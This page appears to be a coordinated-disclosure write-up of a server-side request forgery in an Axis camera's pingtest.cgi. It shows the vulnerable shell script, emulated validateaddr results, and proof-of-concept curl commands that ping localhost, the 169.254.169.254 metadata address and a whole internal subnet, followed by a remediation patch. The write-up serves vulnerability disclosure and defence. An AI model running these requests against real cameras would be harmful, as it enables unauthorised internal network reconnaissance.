security-research-notebook/pingtest-ssrf-missing-validateaddr/index.html

423 lines · html
<!doctype html>
<html lang="en"><head><meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Server-Side Request Forgery via pingtest.cgi Missing Address Validation | Zion Boggan</title>
<meta name="description" content="`pingtest.cgi` skips the camera&amp;#x27;s own `validateaddr` helper.">
<link rel="icon" href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'%3E%3Crect width='32' height='32' rx='6' fill='%230c0e12'/%3E%3Ctext x='16' y='22' font-family='monospace' font-size='15' fill='%236cc7b8' text-anchor='middle'%3Ezb%3C/text%3E%3C/svg%3E">
<style>
  :root{
    --bg:#0c0e12; --bg2:#0f1217; --panel:#14181f; --panel2:#171c24;
    --line:#222936; --line2:#2c3543;
    --ink:#e8eaed; --soft:#c3cad4; --muted:#8a94a3; --faint:#5d6675;
    --accent:#6cc7b8; --accent-dim:#274b47;
    --maxw:1020px;
  }
  *{box-sizing:border-box;}
  html{scroll-behavior:smooth;}
  body{margin:0;background:var(--bg);color:var(--ink);
    font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
    font-size:16px;line-height:1.65;-webkit-font-smoothing:antialiased;}
  .mono{font-family:ui-monospace,SFMono-Regular,"SF Mono",Menlo,Consolas,monospace;}
  a{color:var(--accent);text-decoration:none;}
  a:hover{color:#8fe0d2;}
  .wrap{max-width:var(--maxw);margin:0 auto;padding:0 24px;}
 
  /* nav */
  nav{position:sticky;top:0;z-index:20;background:rgba(12,14,18,.82);
    backdrop-filter:blur(10px);border-bottom:1px solid var(--line);}
  nav .wrap{display:flex;align-items:center;justify-content:space-between;height:58px;}
  nav .brand{font-weight:600;letter-spacing:.2px;}
  nav .brand .dot{color:var(--accent);}
  nav .links{display:flex;gap:26px;font-size:13.5px;}
  nav .links a{color:var(--muted);}
  nav .links a:hover{color:var(--ink);}
  @media(max-width:680px){nav .links{display:none;}}
 
  /* hero */
  header.hero{padding:74px 0 54px;border-bottom:1px solid var(--line);
    background:radial-gradient(900px 380px at 78% -10%, #11201e 0%, transparent 60%);}
  .avail{font-size:12.5px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);
    display:flex;align-items:center;gap:9px;margin-bottom:20px;}
  .avail .pulse{width:7px;height:7px;border-radius:50%;background:var(--accent);
    box-shadow:0 0 0 0 rgba(108,199,184,.5);animation:p 2.4s infinite;}
  @keyframes p{0%{box-shadow:0 0 0 0 rgba(108,199,184,.45)}70%{box-shadow:0 0 0 8px rgba(108,199,184,0)}100%{box-shadow:0 0 0 0 rgba(108,199,184,0)}}
  h1{font-size:clamp(34px,6vw,52px);line-height:1.05;margin:0 0 8px;letter-spacing:-1px;font-weight:680;}
  .hero .sub{font-size:clamp(16px,2.4vw,20px);color:var(--soft);margin:0 0 24px;font-weight:500;}
  .hero .lede{max-width:660px;color:var(--soft);font-size:17px;margin:0 0 28px;}
  .hero .lede b{color:var(--ink);font-weight:600;}
  .cta{display:flex;flex-wrap:wrap;gap:12px;align-items:center;}
  .btn{display:inline-flex;align-items:center;gap:8px;padding:10px 18px;border-radius:8px;
    font-size:14.5px;font-weight:550;border:1px solid var(--line2);color:var(--ink);background:var(--panel);}
  .btn:hover{border-color:var(--accent-dim);background:var(--panel2);color:var(--ink);}
  .btn.primary{background:var(--accent);color:#06231f;border-color:var(--accent);font-weight:650;}
  .btn.primary:hover{background:#8fe0d2;color:#06231f;}
  .meta{margin-top:26px;display:flex;flex-wrap:wrap;gap:8px 22px;font-size:13px;color:var(--muted);}
  .meta .mono{color:var(--faint);}
 
  /* sections */
  section{padding:64px 0;border-bottom:1px solid var(--line);}
  .shead{display:flex;align-items:baseline;gap:14px;margin-bottom:30px;}
  .shead .idx{font-size:13px;color:var(--accent);letter-spacing:1px;}
  .shead h2{font-size:14px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:0;font-weight:600;}
  .shead .rule{flex:1;height:1px;background:var(--line);}
 
  /* flagship */
  .flag{background:linear-gradient(180deg,var(--panel) 0%,var(--bg2) 100%);
    border:1px solid var(--line2);border-radius:14px;overflow:hidden;}
  .flag .top{padding:30px 32px 8px;}
  .flag .tag{font-size:12px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);margin-bottom:12px;}
  .flag h3{font-size:27px;margin:0 0 6px;letter-spacing:-.4px;}
  .flag h3 .v{font-size:13px;color:var(--muted);font-weight:500;margin-left:8px;letter-spacing:0;}
  .flag .grid{display:grid;grid-template-columns:1.25fr 1fr;gap:30px;padding:14px 32px 30px;}
  .flag p{color:var(--soft);margin:0 0 16px;}
  .flag .stats{display:grid;grid-template-columns:1fr 1fr;gap:12px;margin-top:6px;}
  .stat{background:var(--bg);border:1px solid var(--line);border-radius:9px;padding:13px 15px;}
  .stat .n{font-size:21px;font-weight:680;color:var(--ink);}
  .stat .k{font-size:12px;color:var(--muted);margin-top:2px;}
  .spec{background:var(--bg);border:1px solid var(--line);border-radius:10px;padding:18px 18px;}
  .spec .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:10px;}
  .spec ul{margin:0;padding:0;list-style:none;font-size:13.5px;}
  .spec li{padding:6px 0;border-top:1px solid var(--line);color:var(--soft);display:flex;justify-content:space-between;gap:14px;}
  .spec li:first-child{border-top:none;}
  .spec li span{color:var(--muted);}
  .flag .foot{padding:0 32px 28px;display:flex;gap:18px;flex-wrap:wrap;font-size:14px;}
  @media(max-width:720px){.flag .grid{grid-template-columns:1fr;}}
 
  /* lab cards */
  .cards{display:grid;grid-template-columns:1fr 1fr;gap:20px;}
  @media(max-width:680px){.cards{grid-template-columns:1fr;}}
  .card{border:1px solid var(--line);border-radius:12px;overflow:hidden;background:var(--panel);
    display:flex;flex-direction:column;transition:border-color .15s,transform .15s;}
  .card:hover{border-color:var(--accent-dim);transform:translateY(-2px);}
  .card .thumb{height:172px;overflow:hidden;border-bottom:1px solid var(--line);background:#fff;}
  .card .thumb img{width:100%;height:100%;object-fit:cover;object-position:top left;display:block;}
  .card .body{padding:18px 20px 20px;display:flex;flex-direction:column;flex:1;}
  .card h3{margin:0 0 9px;font-size:17px;}
  .card p{margin:0 0 14px;font-size:14px;color:var(--soft);flex:1;}
  .tags{display:flex;flex-wrap:wrap;gap:6px;margin-bottom:14px;}
  .tags span{font-size:11.5px;color:var(--muted);background:var(--bg);border:1px solid var(--line);
    border-radius:5px;padding:3px 8px;}
  .card .lnk{font-size:13.5px;font-family:ui-monospace,Menlo,monospace;}
  .card .lnk::after{content:" →";}
 
  /* research */
  .rlede{color:var(--soft);max-width:680px;margin:-6px 0 26px;}
  .research{display:flex;flex-direction:column;gap:0;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
  .ritem{display:grid;grid-template-columns:120px 1fr auto;gap:18px;align-items:center;
    padding:18px 22px;border-top:1px solid var(--line);}
  .ritem:first-child{border-top:none;}
  .ritem:hover{background:var(--panel);}
  .ritem .cls{font-size:11px;letter-spacing:.5px;text-transform:uppercase;color:var(--accent);}
  .ritem h3{margin:0 0 3px;font-size:16px;}
  .ritem p{margin:0;font-size:13.5px;color:var(--muted);}
  .ritem .go{font-family:ui-monospace,Menlo,monospace;font-size:13px;white-space:nowrap;}
  @media(max-width:680px){.ritem{grid-template-columns:1fr;gap:6px;}.ritem .go{margin-top:4px;}}
  .progs{margin-top:22px;}
  .progs .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:11px;}
  .progs .row{display:flex;flex-wrap:wrap;gap:7px;}
  .progs .row span{font-size:12.5px;color:var(--soft);background:var(--panel);border:1px solid var(--line);
    border-radius:6px;padding:4px 10px;}
 
  /* credentials */
  .cred{display:grid;grid-template-columns:1.1fr 1fr;gap:28px;}
  @media(max-width:680px){.cred{grid-template-columns:1fr;}}
  .cred p{color:var(--soft);margin:0 0 14px;}
  .cred .role{font-size:14px;color:var(--muted);}
  .cred .role b{color:var(--ink);font-weight:600;}
  .certs{list-style:none;margin:0;padding:0;}
  .certs li{padding:9px 0;border-top:1px solid var(--line);font-size:14px;color:var(--soft);
    display:flex;gap:10px;align-items:baseline;}
  .certs li:first-child{border-top:none;}
  .certs li .c{color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:12px;}
 
  footer{padding:46px 0 64px;}
  footer .row{display:flex;flex-wrap:wrap;justify-content:space-between;gap:18px;align-items:center;}
  footer .links a{color:var(--soft);margin-right:20px;font-size:14px;}
  footer .note{color:var(--faint);font-size:12.5px;max-width:520px;}
 
  .detail-hero{padding:40px 0 26px;}
  .back{display:inline-block;font-size:13px;color:var(--muted);margin-bottom:20px;font-family:ui-monospace,Menlo,monospace;}
  .back:hover{color:var(--ink);}
  .kicker{font-size:12px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin-bottom:13px;font-family:ui-monospace,Menlo,monospace;}
  .detail-hero h1{font-size:clamp(26px,4.6vw,38px);margin:0 0 12px;letter-spacing:-.5px;}
  .detail-hero .tagline{font-size:clamp(15px,2vw,18px);color:var(--soft);max-width:800px;margin:0 0 16px;}
  .facts{display:grid;grid-template-columns:repeat(auto-fit,minmax(150px,1fr));gap:12px;margin-top:22px;}
  .content{padding:8px 0 0;max-width:840px;}
  .content h1{font-size:24px;margin:40px 0 14px;letter-spacing:-.4px;color:var(--ink);}
  .content h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:42px 0 15px;font-weight:600;border-top:1px solid var(--line);padding-top:28px;}
  .content h3{font-size:17px;margin:28px 0 10px;color:var(--ink);font-weight:600;}
  .content h4{font-size:14px;margin:22px 0 8px;color:var(--soft);font-weight:600;text-transform:uppercase;letter-spacing:.5px;}
  .content p{color:var(--soft);margin:0 0 15px;}
  .content ul,.content ol{color:var(--soft);margin:0 0 15px;padding-left:22px;}
  .content li{margin:5px 0;}
  .content strong{color:var(--ink);font-weight:600;}
  .content a{color:var(--accent);}
  .content code{font-family:ui-monospace,Menlo,monospace;font-size:12.8px;background:var(--panel2);border:1px solid var(--line);border-radius:4px;padding:1px 5px;color:var(--soft);}
  .content pre{background:var(--bg2);border:1px solid var(--line2);border-radius:10px;padding:15px 18px;overflow-x:auto;margin:0 0 18px;}
  .content pre code{background:none;border:none;padding:0;font-size:12.4px;color:var(--soft);line-height:1.6;white-space:pre;}
  .content table{width:100%;border-collapse:collapse;margin:2px 0 20px;font-size:13.3px;}
  .content th{text-align:left;color:var(--muted);font-weight:600;border-bottom:1px solid var(--line2);padding:9px 12px;font-size:11px;letter-spacing:.6px;text-transform:uppercase;}
  .content td{color:var(--soft);border-bottom:1px solid var(--line);padding:9px 12px;vertical-align:top;}
  .content blockquote{border-left:3px solid var(--accent-dim);margin:0 0 16px;padding:2px 0 2px 18px;color:var(--muted);}
  .content hr{border:none;border-top:1px solid var(--line);margin:30px 0;}
  /* notebook index */
  .nbgroup{margin:40px 0 0;}
  .nbgroup h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin:0 0 4px;font-weight:600;}
  .nbgroup .gd{color:var(--faint);font-size:13px;margin:0 0 14px;}
  .nbtable{width:100%;border-collapse:collapse;font-size:14px;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
  .nbtable tr{border-top:1px solid var(--line);}
  .nbtable tr:first-child{border-top:none;}
  .nbtable tr:hover{background:var(--panel);}
  .nbtable td{padding:14px 16px;vertical-align:top;}
  .nbtable .cls{white-space:nowrap;color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:11.5px;text-transform:uppercase;letter-spacing:.5px;width:150px;}
  .nbtable .ti a{font-weight:600;color:var(--ink);}
  .nbtable .ti a:hover{color:var(--accent);}
  .nbtable .ol{color:var(--muted);font-size:13px;margin-top:3px;}
  @media(max-width:680px){.nbtable .cls{width:auto;display:block;}}
</style>
<link rel="canonical" href="https://zionboggan.com/security-research-notebook/pingtest-ssrf-missing-validateaddr/">
<meta name="author" content="Zion Boggan">
<meta name="robots" content="index, follow, max-image-preview:large">
<meta property="og:type" content="article">
<meta property="og:site_name" content="Zion Boggan">
<meta property="og:title" content="Server-Side Request Forgery via pingtest.cgi Missing Address Validation | Zion Boggan">
<meta property="og:description" content="`pingtest.cgi` skips the camera&amp;#x27;s own `validateaddr` helper.">
<meta property="og:url" content="https://zionboggan.com/security-research-notebook/pingtest-ssrf-missing-validateaddr/">
<meta property="og:image" content="https://zionboggan.com/assets/og-default.png">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="Server-Side Request Forgery via pingtest.cgi Missing Address Validation | Zion Boggan">
<meta name="twitter:description" content="`pingtest.cgi` skips the camera&amp;#x27;s own `validateaddr` helper.">
<meta name="twitter:image" content="https://zionboggan.com/assets/og-default.png">
<script type="application/ld+json">{"@context":"https://schema.org","@type":"TechArticle","headline":"Server-Side Request Forgery via pingtest.cgi Missing Address Validation","description":"`pingtest.cgi` skips the camera&amp;#x27;s own `validateaddr` helper.","url":"https://zionboggan.com/security-research-notebook/pingtest-ssrf-missing-validateaddr/","image":"https://zionboggan.com/assets/og-default.png","author":{"@type":"Person","name":"Zion Boggan","url":"https://zionboggan.com"},"publisher":{"@type":"Person","name":"Zion Boggan"}}</script>
</head><body>
<nav><div class="wrap">
  <a class="brand mono" href="/" style="color:var(--ink)">zion_boggan<span class="dot">.</span></a>
  <span class="links"><a href="/#oversight">Oversight</a><a href="/#labs">Labs</a><a href="/#research">Research</a><a href="/security-research-notebook/">Notebook</a><a href="/">Home</a></span>
</div></nav>
<header class="hero detail-hero"><div class="wrap">
  <a class="back" href="/security-research-notebook/">&larr; Research notebook</a>
  <div class="kicker">SSRF</div>
  <h1>Server-Side Request Forgery via pingtest.cgi Missing Address Validation</h1>
</div></header>
<section><div class="wrap"><div class="content">
<p><strong>VRT Category:</strong> Insecure OS/Firmware
<strong>URL/Location:</strong> <code>https://&lt;camera&gt;/axis-cgi/pingtest.cgi?ip=127.0.0.1</code>
<strong>Firmware:</strong> AXIS OS P3245-LV version 11.11.192 (LTS 2024 track)
<strong>File:</strong> <code>/usr/html/axis-cgi/pingtest.cgi</code> (shell script)</p>
<p><strong>Note:</strong> This is a distinct vulnerability from any httptest.cgi findings.
pingtest.cgi is a separate CGI script with a completely different code path
(shell script using busybox ping, vs ELF binary using libcurl). The fix is
independent: add a <code>validateaddr</code> call to pingtest.cgi.</p>
<hr />
<h2>Description</h2>
<p>The VAPIX API endpoint <code>pingtest.cgi</code> does not validate the user-supplied
<code>ip</code> parameter against internal/loopback addresses before executing <code>ping</code>.
The functionally identical endpoint <code>tcptest.cgi</code> calls the <code>validateaddr</code>
binary for exactly this purpose. This differential omission allows any
authenticated user (viewer or higher) to use the camera as a pivot point to
ping arbitrary internal network hosts, including localhost, RFC1918 ranges,
and link-local metadata endpoints.</p>
<p><strong>Authentication required:</strong> Viewer (lowest privilege). The endpoint exists
at <code>/axis-cgi/viewer/pingtest.cgi</code> confirming viewer-level access.</p>
<hr />
<h2>Proof of Concept</h2>
<h3>Step 0: Firmware evidence (source code comparison)</h3>
<p>Firmware was extracted from P3245-LV_11_11_192.bin (squashfs, zstd, ARTPEC-7 ARM):</p>
<pre><code>binwalk --run-as=root -e P3245-LV_11_11_192.bin
unsquashfs -d rootfs_extracted rootfs/rootfs.img
</code></pre>
<h3>Step 1: Source code of pingtest.cgi (VULNERABLE)</h3>
<p>Full source at <code>/usr/html/axis-cgi/pingtest.cgi</code>:</p>
<pre><code class="language-sh">#!/bin/sh
 
# CGI parameters                default
#   ip=&lt;ip address&gt;
#   generate_header=yes|no      yes
 
# Error output to console
[ ! -w /dev/console ] || exec 2&gt;/dev/console
 
. /usr/html/axis-cgi/lib/functions.sh
 
# CGI compliant by default
CGI_HDGEN=yes
ip=
 
if [ &quot;$REQUEST_METHOD&quot; = &quot;POST&quot; ]; then
    if [ &quot;$CONTENT_LENGTH&quot; -gt 0 ]; then
        read -n $CONTENT_LENGTH POST_DATA &lt;&amp;0
    fi
fi
 
tmp=$(__qs_getparam generate_header)
[ -z &quot;$tmp&quot; ] || CGI_HDGEN=$tmp
 
# IP address is necessary.
tmp=$(__qs_getparam ip) || {
    __cgi_errhd 400 &quot;IP address missing&quot;
    exit 1
}
if [ -z &quot;$tmp&quot; ]; then
    __cgi_errhd 400 &quot;IP address empty&quot;
    exit 1
else
    ip=$tmp                          # &lt;-- NO VALIDATION
fi
 
ip_in_use=&quot;got response&quot;
ip_unused=&quot;no response&quot;
 
if ping  &quot;$ip&quot; &gt;/dev/null; then      # &lt;-- DIRECT USE IN PING
    if [ &quot;$CGI_HDGEN&quot; = yes ]; then
        __cgi_errhd 200 &quot;$ip_in_use&quot;
    else
        echo &quot;$ip_in_use&quot;
    fi
else
    if [ &quot;$CGI_HDGEN&quot; = yes ]; then
        __cgi_errhd 200 &quot;$ip_unused&quot;
    else
        echo &quot;$ip_unused&quot;
    fi
fi
</code></pre>
<p>The <code>$ip</code> parameter flows from <code>__qs_getparam ip</code> directly to <code>ping "$ip"</code> with <strong>zero validation</strong>.</p>
<h3>Step 2: Source code of tcptest.cgi (PATCHED &ndash; has validation)</h3>
<p>Relevant excerpt from <code>/usr/html/axis-cgi/tcptest.cgi</code> showing the validation that pingtest.cgi is missing:</p>
<pre><code class="language-sh">check_host_addr() {
    [ -x &quot;$(command -v validateaddr)&quot; ] || {
        report_status &quot;$cgi_hdgen&quot; 500 &quot;Cannot validate address&quot;
        exit 1
    }
    set +e
    validateaddr $1
    validation_res=$?
    case $validation_res in
        1)
            report_status &quot;$cgi_hdgen&quot; 400 &quot;Invalid localhost address&quot;
            exit 1
            ;;
        2)
            report_status &quot;$cgi_hdgen&quot; 400 &quot;Could not resolve address&quot;
            exit 1
            ;;
        3)
            report_status &quot;$cgi_hdgen&quot; 400 &quot;Error validating address&quot;
            exit 1
            ;;
    esac
    set -e
}
 
addr__=$(__qs_getparam address) &amp;&amp; [ &quot;$addr__&quot; ] || {
    report_status &quot;$cgi_hdgen&quot; 400 &quot;Please specify host name or address&quot;
    exit 1
}
 
check_host_addr &quot;$addr__&quot;            # &lt;-- VALIDATES BEFORE USE
 
res=$(tcptest 10 &quot;$addr__&quot; &quot;$port__&quot; 2&gt;&amp;1) || {
</code></pre>
<p><code>tcptest.cgi</code> calls <code>validateaddr</code> which returns exit code 1 for localhost addresses, exit code 2 for unresolvable addresses, and exit code 3 for format errors. <code>pingtest.cgi</code> has none of this.</p>
<h3>Step 3: Firmware binary execution &ndash; validateaddr results</h3>
<p>The <code>validateaddr</code> binary was executed directly from the extracted firmware
using QEMU user-mode emulation (<code>qemu-arm-static</code>), proving exactly what
<code>tcptest.cgi</code> blocks that <code>pingtest.cgi</code> does not:</p>
<pre><code>$ for addr in 127.0.0.1 127.0.0.2 127.0.0.12 127.0.0.255 127.1.1.1 \
              REDACTED-IP 172.16.0.1 [ip redacted] 169.254.169.254 0.0.0.0 8.8.8.8; do
    qemu-arm-static -L $ROOTFS $ROOTFS/usr/bin/validateaddr &quot;$addr&quot;
    echo &quot;$addr: exit $?&quot;
  done
 
127.0.0.1            BLOCKED (exit 1)
127.0.0.2            BLOCKED (exit 1)
127.0.0.12           BLOCKED (exit 1)
127.0.0.255          BLOCKED (exit 1)
127.1.1.1            BLOCKED (exit 1)
REDACTED-IP             ALLOWED (exit 0)
172.16.0.1           ALLOWED (exit 0)
[ip redacted]          ALLOWED (exit 0)
169.254.169.254      ALLOWED (exit 0)
0.0.0.0              BLOCKED (exit 1)
8.8.8.8              ALLOWED (exit 0)
</code></pre>
<p><code>validateaddr</code> blocks all loopback addresses (127.0.0.0/8) and 0.0.0.0.
<code>tcptest.cgi</code> calls this binary. <code>pingtest.cgi</code> does not &ndash; so all of
the above addresses including every 127.x.x.x are reachable via <code>pingtest.cgi</code>.</p>
<h3>Step 4: Exploit &ndash; Ping internal addresses</h3>
<pre><code class="language-bash"># Ping localhost (should be blocked, isn't)
curl -s --digest -u '&lt;viewer_user&gt;:&lt;viewer_pass&gt;' \
  &quot;https://CAMERA_IP/axis-cgi/pingtest.cgi?ip=127.0.0.1&quot;
# Expected: &quot;got response&quot; (proves localhost is reachable)
 
# Ping link-local metadata endpoint (cloud environments)
curl -s --digest -u '&lt;viewer_user&gt;:&lt;viewer_pass&gt;' \
  &quot;https://CAMERA_IP/axis-cgi/pingtest.cgi?ip=169.254.169.254&quot;
 
# Scan a /24 subnet for live hosts
for i in $(seq 1 254); do
  resp=$(curl -s --digest -u '&lt;viewer_user&gt;:&lt;viewer_pass&gt;' \
    &quot;https://CAMERA_IP/axis-cgi/pingtest.cgi?ip=REDACTED-IP&quot;)
  echo &quot;REDACTED-IP: $resp&quot;
done
# Output: each IP shows &quot;got response&quot; or &quot;no response&quot;
 
# Confirm internal Apache VHosts are reachable
for addr in 127.0.0.2 127.0.0.3 127.0.0.12; do
  curl -s --digest -u '&lt;viewer_user&gt;:&lt;viewer_pass&gt;' \
    &quot;https://CAMERA_IP/axis-cgi/pingtest.cgi?ip=$addr&quot;
done
</code></pre>
<h3>Step 5: Verify tcptest.cgi blocks the same requests</h3>
<pre><code class="language-bash"># tcptest.cgi with localhost -- returns &quot;Invalid localhost address&quot;
curl -s --digest -u '&lt;viewer_user&gt;:&lt;viewer_pass&gt;' \
  &quot;https://CAMERA_IP/axis-cgi/tcptest.cgi?address=127.0.0.1&amp;port=80&quot;
# Expected: &quot;Invalid localhost address&quot;
 
# pingtest.cgi with the SAME address -- no validation, ping succeeds
curl -s --digest -u '&lt;viewer_user&gt;:&lt;viewer_pass&gt;' \
  &quot;https://CAMERA_IP/axis-cgi/pingtest.cgi?ip=127.0.0.1&quot;
# Expected: &quot;got response&quot;
</code></pre>
<hr />
<h2>Impact</h2>
<ul>
<li><strong>Internal network reconnaissance</strong>: Viewer maps the camera&rsquo;s local network, discovers hosts, identifies infrastructure</li>
<li><strong>Cloud metadata exposure</strong>: In cloud-hosted camera deployments, 169.254.169.254 may expose instance credentials</li>
<li><strong>Internal service discovery</strong>: AXIS OS has internal services on 127.0.0.2/3/12; confirming their existence aids further attacks</li>
<li><strong>Pivot point</strong>: Camera becomes an ICMP scanning tool inside the network perimeter</li>
</ul>
<hr />
<h2>CVSS</h2>
<p><strong>Score:</strong> 5.0 (Medium)
<strong>Vector:</strong> CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N</p>
<p>Scope is Changed because the impact extends beyond the camera to the internal network.</p>
<hr />
<h2>Remediation</h2>
<p>Add the <code>check_host_addr</code> function (identical to <code>tcptest.cgi</code>) to <code>pingtest.cgi</code> before the <code>ping</code> command:</p>
<pre><code class="language-sh"># Add after ip=$tmp and before the ping call:
check_host_addr() {
    [ -x &quot;$(command -v validateaddr)&quot; ] || {
        __cgi_errhd 500 &quot;Cannot validate address&quot;
        exit 1
    }
    set +e
    validateaddr $1
    validation_res=$?
    case $validation_res in
        1) __cgi_errhd 400 &quot;Invalid localhost address&quot;; exit 1 ;;
        2) __cgi_errhd 400 &quot;Could not resolve address&quot;; exit 1 ;;
        3) __cgi_errhd 400 &quot;Error validating address&quot;; exit 1 ;;
    esac
    set -e
}
 
check_host_addr &quot;$ip&quot;
</code></pre>
<hr><p style="color:var(--faint);font-size:12.5px;font-family:ui-monospace,Menlo,monospace">Source &middot; github.com/zionboggan/security-research-notebook &middot; writeups/axis-os/pingtest-ssrf-missing-validateaddr.md</p>
</div></div></section>
<footer><div class="wrap row">
  <div class="links"><a href="/">Portfolio</a><a href="https://www.linkedin.com/in/zion-boggan">LinkedIn</a><a href="/security-research-notebook/">Notebook</a><a href="mailto:zionboggan0@gmail.com">Email</a></div>
  <div class="note">Coordinated-disclosure research. Findings appear here only after the program's disclosure window closed, the patch shipped, or a CVE was published. No customer data was accessed.</div>
</div></footer>
</body></html>